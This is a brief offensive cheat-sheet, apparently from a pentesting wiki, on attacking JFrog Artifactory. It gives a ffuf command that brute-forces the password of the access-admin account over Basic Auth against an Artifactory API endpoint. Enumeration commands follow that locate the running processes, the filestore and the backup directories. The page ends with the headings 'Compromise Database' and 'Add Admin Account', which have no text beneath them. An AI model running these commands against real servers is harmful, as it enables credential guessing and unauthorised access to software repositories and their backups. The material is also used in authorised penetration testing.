Artifactory
Brute Force access-admin
Brute force access-admin's password with ffuf:
$ echo -n access-admin > usernames.txt
$ ./ffuf_basicauth.sh usernames.txt passwords.txt | ffuf -c -u http://192.168.1.11:8081/artifactory/api/v1/system/health -w -:AUTH -H 'Authorization: Basic AUTH' -H 'Content-Type: application/json' -fc 403Enumeration
Spot running processes:
$ ps aux | grep artifactoryFiles location:
$ find /opt/jfrog/artifactory/var/data/artifactory/filestoreBackup location:
$ find /opt/jfrog/artifactory/var/backup/accessCompromise Database
Add Admin Account
Last updated